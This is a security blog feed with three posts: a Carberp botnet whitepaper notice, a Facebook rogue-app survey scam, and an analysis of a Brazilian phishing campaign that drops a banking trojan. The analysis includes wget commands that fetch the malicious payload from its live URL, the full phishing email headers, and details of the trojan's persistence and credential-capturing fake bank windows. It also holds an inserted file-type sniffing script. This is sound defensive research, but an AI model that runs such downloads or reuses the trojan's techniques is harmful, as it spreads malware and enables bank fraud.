MalwareIntelligence Team<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-24032274174126014422011-02-21T10:06:00.000+00:002011-02-21T13:53:01.196+00:00New whitepaper about Carberp Botnet<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YTDEO3DuLQc/TWE8PvEFz_I/AAAAAAAAAb8/0uJEfYLuNr0/s1600/inside-carberp-botnet-en.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-YTDEO3DuLQc/TWE8PvEFz_I/AAAAAAAAAb8/0uJEfYLuNr0/s200/inside-carberp-botnet-en.png" width="141" /></a></div><div style="text-align: justify;">A <a href="http://www.malwareint.com/docs.html" style="color: orange;">new whitepaper</a> is available that describes the operation of one of the botnets "wanted" by the security community: <b>Carberp</b>.<br />
<br />
The article, called <b>Inside Carberp Botnet</b> and written by Francisco Ruiz, Crimeware Researcher at <b>Malware<span style="color: blue;">Intelligence</span></b>, details the different parts of this crimeware and documents its full mode of operation.<br />
<br />
In recent weeks Carberp has returned to prominence due to the revival of several of its former C&C servers. However, <b>Malware<span style="color: blue;">Intelligence</span></b> experts believe they have concrete evidence demonstrating that the original group behind the first generation of Carberp has in fact broken up, and that some of the new botnets spreading the Carberp banking trojan are managed through a modified version of the original.<br />
<br />
<b>Malware<span style="color: blue;">Intelligence</span></b> has a <b>Carberp Working Group</b> responsible for private research into, and requests concerning, this particular threat. <a href="http://malwareint.blogspot.com/2011/02/inside-carberp-botnet.html" style="color: orange;">In the main blog</a>, Ruiz also said that the Carberp botnet was marketed privately in a very closed environment, but since a few days ago the marketing model has been opened up, giving some details of its current features and costs.</div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-2254834146329362822011-02-14T20:10:00.000+00:002015-09-02T00:59:24.086+01:00Facebook rogue applications still lurking aroundFor quite some time now there have been rogue applications trying to convince you that you can check who has viewed your profile. This rogue application goes by many different names, including but not limited to:<br />
<ul>
<li>creep exterminators</li>
<li>catch them being creepy</li>
<li>creepy profile peekers</li>
<li>privacy bros </li>
<li>we catch stalkers </li>
</ul>
<div style="text-align: justify;">
So what will this fake application do? For starters, it will surely NOT show you who's been viewing your profile. If you land on this application, you will be presented with the following screen:</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-OKjJhNlwTEw/TVmJP3wj1NI/AAAAAAAAAbU/YW48C6idk_8/s1600/MI-MD_prof.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="246" src="http://4.bp.blogspot.com/-OKjJhNlwTEw/TVmJP3wj1NI/AAAAAAAAAbU/YW48C6idk_8/s400/MI-MD_prof.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Profile Creeps application</b></i></span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-pQjYVyGADSQ/TVmQaJ2U03I/AAAAAAAAAbk/QNyHDyXs7A0/s1600/MI-MD-face.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="221" src="http://3.bp.blogspot.com/-pQjYVyGADSQ/TVmQaJ2U03I/AAAAAAAAAbk/QNyHDyXs7A0/s400/MI-MD-face.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Request for permission</b></i></span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
You then have to allow the application access so it can show you who has been lurking around your profile. But wait! You first have to complete a survey, and only then can you check it out. Simple, right?</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-MRI6PsEgGvk/TVmJ6GQot1I/AAAAAAAAAbc/PS2-GLV-EEk/s1600/MI-MD_fee.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="299" src="http://3.bp.blogspot.com/-MRI6PsEgGvk/TVmJ6GQot1I/AAAAAAAAAbc/PS2-GLV-EEk/s400/MI-MD_fee.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Facebook verification</b></i></span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Not exactly. These fake surveys are pretty common on the internet; it is a typical scam. For example, one particular survey urged me to download SmileyCentral, while another tried to deliver Webfetti.</div>
<ul>
<li><a href="http://www.virustotal.com/file-scan/report.html?id=3aea99720c89ca1b6552e0b10624cf6ad86d65bad6e659599019c9029bdcec8b-1297697679" style="color: orange;">9ed197b533fdf53ab8cf9e83a1b5951d</a> (<b>Webfetti.exe</b>)</li>
<li><a href="http://www.virustotal.com/file-scan/report.html?id=ef70b622c8b53c4f286127151ff41be799896de49d0d10e75a673bffcea7ee30-1297688529" style="color: orange;">ff8d221113615909b07b1ba9ceb8466a</a> (<b>SmileyCentralPFSetup2.3.78.2.NoSA.NoHP.ZNfox000.exe</b>)</li>
</ul>
<br />
<div style="text-align: justify;">
Another fake survey wanted me to fill in my phone number, and afterwards send an (expensive) text message to 'unlock' the application. In addition to letting you fall into one of these scams, the rogue application also promotes itself on all of your friends’ walls:</div>
<br />
<br />
<br />
<br />
<br />
<center>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/--A7VvN-kr18/TVmKNJ5kAjI/AAAAAAAAAbg/Bb9LMs4E5G4/s1600/MI-MD_rogue.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="66" src="http://1.bp.blogspot.com/--A7VvN-kr18/TVmKNJ5kAjI/AAAAAAAAAbg/Bb9LMs4E5G4/s400/MI-MD_rogue.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Rogue application spreading itself on other people’s wall</b></i></span></td></tr>
</tbody></table>
</center>
<br />
<br />
If you would like to remove it, follow the steps below:<br />
<ul>
<li style="text-align: justify;">Go to your Facebook profile. Find the post that mentions the "stalker" application</li>
<li style="text-align: justify;">Hover over it and you will see an X appear. Click on it and choose "Remove (name of the fake application here)". </li>
<li style="text-align: justify;">Additionally, you can also report it as abusive to help stop these types of applications.</li>
<li style="text-align: justify;">Next step is to click on My Account and choose Privacy Settings. Down below you can see "Apps and websites". Click on Edit your settings. </li>
<li style="text-align: justify;">Select Remove unwanted or spammy apps. You can now Edit the application and remove it.</li>
</ul>
<br />
MalwareIntelligence Team<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-84356821745957676662011-01-30T15:47:00.000+00:002011-01-30T15:48:42.881+00:00Big Brother Brazil 2011 (AKA BBB 2011) malware attack<div style="text-align: justify;">Big Brother 2011 (AKA BBB 2011) has begun in Brazil, and it is being used as a lure for social engineering attacks.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Big Brother Brasil 2011 began on January 11th in Brazil, and malware authors must be celebrating: the show is very popular, so it is easy to attract victims (via social engineering) with supposed videos or pictures of the BBB 2011 participants.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">We will show you a threat that arrived as a phishing message and uses social engineering to ask recipients to click a link in order to watch a video of a transsexual participant who is supposedly confusing the male participants of BBB 2011.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">As you can see in the original e-mail below, the attacker used a technique known as DHA (<a href="http://en.wikipedia.org/wiki/Directory_Harvest_Attack" style="color: orange;">Directory Harvest Attack</a>) against the @hotmail.com domain in order to send the phishing message to valid e-mail addresses.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUV6w2H7yzI/AAAAAAAAAaw/1zfX6MLXWXU/s1600/1-MI_First-Phishing+Message+received.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUV6w2H7yzI/AAAAAAAAAaw/1zfX6MLXWXU/s400/1-MI_First-Phishing+Message+received.JPG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<div style="text-align: justify;">Note that when you hover the mouse over the link, which appears to lead to youtube.com, the status bar shows that it does not take you to the youtube.com website at all. It takes you to hxxp://twurl.nl/rbpm6s.</div><br />
Below is the source of the phishing message:<br />
<br />
----------------------------------------------------------------<br />
<i><span style="font-size: x-small;">X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtTQ0w9Ng==</span></i><br />
<i><span style="font-size: x-small;">X-Message-Status: n</span></i><br />
<i><span style="font-size: x-small;">X-SID-PRA: globo.com (BBB 2011) &lt;communications_msn_cs_ptbr@microsoft.windowslive.com&gt;<br />
X-SID-Result: Fail<br />
X-DKIM-Result: None<br />
X-AUTH-Result: FAIL<br />
X-Message-Info: DkpufaDli9Iih8M1I3rOCBHB3/E1htFb2qXrXVLfpfjlNFuHVG90WYrx2zq5Mw1fmsHKOjL4weQGCOatyx0Pn7FYN0czafnY9kSTqtv24cY=<br />
Received: from wl01.ws.poa.ige ([201.94.125.1]) by col0-mc3-f16.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);<br />
Tue, 18 Jan 2011 10:21:08 -0800<br />
Received: from wl01.ws.poa.ige (dcrs8211 [127.0.0.1])<br />
by wl01.ws.poa.ige (8.13.8/8.13.8) with ESMTP id p0IH1auJ030937;<br />
Tue, 18 Jan 2011 15:01:36 -0200<br />
Received: (from httpd@localhost)<br />
by wl01.ws.poa.ige (8.13.8/8.13.8/Submit) id p0IH1ZXl030933;<br />
Tue, 18 Jan 2011 15:01:35 -0200<br />
To: baa@hotmail.com, bbb@hotmail.com, bcc@hotmail.com,<br />
bdd@hotmail.com, bee@hotmail.com<br />
Subject: ariadna (transesual) no bbb 2011 deixa homens confuso....<br />
X-PHP-Script: mylove2010.info/catastrofe/feed10.php for 187.57.247.86<br />
Date: Tue, 18 Jan 2011 15:01:34 -0200<br />
From: "globo.com (BBB 2011)" &lt;communications_msn_cs_ptbr@microsoft.windowslive.com&gt;<br />
Reply-to: "globo.com (BBB 2011)" &lt;communications_msn_cs_ptbr@microsoft.windowslive.com&gt;<br />
Message-ID: &lt;63a5faa6442cd3b2f870f2ac7a99bde7@mylove2010.info&gt;<br />
X-Priority: 3<br />
X-Mailer: Microsoft Outlook Express 6.00.2800.1409<br />
X-MimeOLE: Produced By Microsoft MimeOLE V6.10.2800.1409.1718742875.rg.sm31<br />
MIME-Version: 1.0<br />
Content-Transfer-Encoding: 8bit<br />
Content-Type: text/html; charset="iso-8859-1"<br />
Return-Path: httpd@wl01.ws.poa.ige</span></i><br />
----------------------------------------------------------------<br />
<br />
As you can see in the source, this phishing message has three main characteristics:<br />
<ol><li><i>A file named feed10.php</i></li>
<li><i>A file named ariedina.jpg3</i></li>
<li><i>A link pointing to the website hxxp://twurl.nl/rbpm6s.</i></li>
</ol><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUV8pbvI-ZI/AAAAAAAAAa4/qGykMcNWTew/s1600/2-MI_second-feed10-php.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUV8pbvI-ZI/AAAAAAAAAa4/qGykMcNWTew/s400/2-MI_second-feed10-php.JPG" width="400" /></a></div><br />
<b>Analyzing the file feed10.php</b><br />
I downloaded this script with the wget utility. See the screenshot below:<br />
<br />
<div style="text-align: center;"><span style="font-family: 'Courier New',Courier,monospace;">wget -v mylove2010.info/catastrofe/feed10.php</span></div>
<br />
<div style="text-align: justify;">As you can see above, this is the SMTP engine used by this threat to send its messages. Just in case, I also submitted this PHP script to VirusTotal and <a href="http://www.virustotal.com/file-scan/report.html?id=45c74823c2888277c1feaf706cc08a032da3557d56e2d7053d88069306b25c96-1295920917" style="color: orange;">you can see the results</a>. It looks like a genuine, general-purpose SMTP mailer script: there is nothing malicious in the program itself, although it is exactly the kind of component that malware campaigns reuse.</div>
<br />
<b>Analyzing the file ariedina.jpg3</b><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> This is just a picture which is used to attract people to click and see a 'video' at youtube.com, however, as you can see on the source code there is a HREF instruction so when the user clicks on this picture (anywhere) it will get the user to the malicious website: hxxp://twurl.nl/rbpm6s</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
I have downloaded this picture so I could analyze it and saw that it's really just a picture:<br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: center;"><div style="text-align: center;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <span style="font-family: "Courier New",Courier,monospace;">wget -v http://lh4.ggpht.com/_FJQwbg0nrOk/TTGRJVC1KtI/AAAAAAAAAMs/CUvYCECUkhM/ariedina.jpg3</span></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: center;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUV-QnoFyJI/AAAAAAAAAa8/N3j1bO7DrgE/s1600/3-MI_third-wget+on+the+ariedinaJPG3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUV-QnoFyJI/AAAAAAAAAa8/N3j1bO7DrgE/s400/3-MI_third-wget+on+the+ariedinaJPG3.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> I have submitted this file to the virustotal website so you can get the report using the link below. There are <a href="http://www.virustotal.com/file-scan/report.html?id=67d170fce9a3b21411cb07a9a1e3ca6de78fff95f997a747fd3bba5400f353c3-1295920946" style="color: orange;">no detection</a> since this is just a picture.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
<b>Analyzing the link hxxp://twurl.nl/rbpm6s</b><br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Using wget pointing to the URL hxxtp://twurl.nl/rbpm6s resulted in downloading a file named youtube_video756.exe.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> </communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: center;"><div style="text-align: center;"><communications_msn_cs_ptbr@microsoft.windowslive.com style="font-family: "Courier New",Courier,monospace;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> wget -v http://twurl.nl/rbpm6s</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
<b>Analyzing youtube_video756.exe</b><br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> After submitting this sample to <a href="http://www.virustotal.com/file-scan/report.html?id=522ef5780f2973f5e01853287619df0ddf1c4447ba6c0dcd3d6591b4778423d5-1295921002" style="color: orange;">virustotal</a> you can see that some AV vendors detects this threat. Some of them using signatures and a couple of them using a in-cloud technology.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
If you run youtube_video756.exe, it will basically perform the following activities:<br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Create a copy of itself using a file named Recorte de tela e Iniciador do OneNote 2007.exe on the folder "C:\Documents and Settings\%user%\Start Menu\Programs\Startup\". This process is then launched.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>It connects to the ftp site ftp.biancarox.net using the username cohabrox and a password which will not be reported here just in case. It downloads 10 files (listed below) to the folder C:\documents and setings\%user%\. While all of these files have a .txt extension, they are not a true .txt file. Looking at its strings you can see that they are really executables.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TUWDgsLT-gI/AAAAAAAAAbA/IwkwiYHhSqI/s1600/4-MI_trojan+has+downloaded+10+files.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TUWDgsLT-gI/AAAAAAAAAbA/IwkwiYHhSqI/s400/4-MI_trojan+has+downloaded+10+files.JPG" width="400" /></a></div><br />
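<div style="text-align: justify;">Both checks above (confirming that ariedina.jpg3 is nothing but a JPEG, and noticing that the ten ".txt" drops are really executables) come down to the same rule: trust the leading bytes of a file, not its extension. Below is an added Python example of that rule; it is not code from the original post, and the byte strings it inspects are constructed stand-ins that borrow the post's file names but not the real files' contents. The EXPECTED_BY_EXT table is an assumption of the example, not something the post defines.</div>

```python
"""Identify a file's real type from its leading bytes instead of trusting its extension.

Added example for this write-up; the byte strings below are constructed stand-ins,
not the real ariedina.jpg3, feed10.php or the dropped .txt files.
"""
from typing import Dict, List, Tuple

# What we expect the sniffer to say for a handful of extensions (assumed table;
# any extension missing here, such as .jpg3, is reported but never called a mismatch).
EXPECTED_BY_EXT = {
    ".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif",
    ".exe": "pe-executable", ".dll": "pe-executable",
    ".txt": "text", ".php": "text",
}


def sniff(data: bytes) -> str:
    """Return a coarse type name derived from magic bytes, not from the file name."""
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "gif"
    if data.startswith(b"MZ"):
        # A PE file has a DOS stub whose e_lfanew field (offset 0x3c) points at "PE\0\0".
        if len(data) >= 0x40:
            e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
            if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                return "pe-executable"
        return "dos-mz"
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "text"
    return "unknown"


def extension_mismatch(name: str, data: bytes) -> Tuple[str, bool]:
    """Return (detected_type, mismatch) for one file name and its contents."""
    detected = sniff(data)
    ext = name[name.rfind("."):].lower() if "." in name else ""
    expected = EXPECTED_BY_EXT.get(ext)
    return detected, expected is not None and expected != detected


def triage(samples: Dict[str, bytes]) -> List[Tuple[str, str, bool]]:
    """Sniff every sample and return (name, detected_type, mismatch) rows."""
    return [(name, *extension_mismatch(name, data)) for name, data in samples.items()]


# Constructed sample bytes: names borrowed from the write-up, contents are NOT the real files.
_PE_STUB = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 20
CONSTRUCTED_SAMPLES: Dict[str, bytes] = {
    "ariedina.jpg3": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16,
    "feed10.php": b"<?php\n// constructed placeholder for an SMTP mailer script\n?>\n",
    "youtube_video756.exe": _PE_STUB,
    "dropped_bank_module.txt": _PE_STUB,   # stands in for the garbled-name .txt drops
    "readme.txt": b"a real text file\r\n",
}

if __name__ == "__main__":
    for name, detected, mismatch in triage(CONSTRUCTED_SAMPLES):
        flag = "MISMATCH" if mismatch else "ok"
        print(f"{name:28s} {detected:14s} {flag}")
```

<div style="text-align: justify;">Running the script prints one row per sample: only the PE file wearing a .txt extension is flagged, while ariedina.jpg3 is reported as jpeg with no mismatch because there is no expectation for that extension. Pointed at C:\Documents and Settings\%user%\ on a suspect machine, the same logic flags the ten dropped files whatever their garbled names are.</div>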
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>Taking a look at the process strings (below), we can see several internet bank sites of Brazil and two webmail websites.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUWEUFT64SI/AAAAAAAAAbE/9aFPewNpOOE/s1600/5-MI_strings+on+memory-target+banks+websites.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TUWEUFT64SI/AAAAAAAAAbE/9aFPewNpOOE/s400/5-MI_strings+on+memory-target+banks+websites.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com>When you open Internet Explorer and type one of the target URLs, like www.bradesco.com.br (which is a true bank of Brazil), it will kill iexplorer.exe and will load a new process C:\Document and Settings\%user%\®¢Ÿª¤ª¥ž¥.txt. If you type anoher URL on the IE address bar like www.bradescoprime.com.br, another process will be launched on this case it would be the ®ž“§«š§«š.txt.</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> </communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> This process is a fake application which emulates the requested website and it will capture your bank agency, account, token, passwords, etc. See screenshots below:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
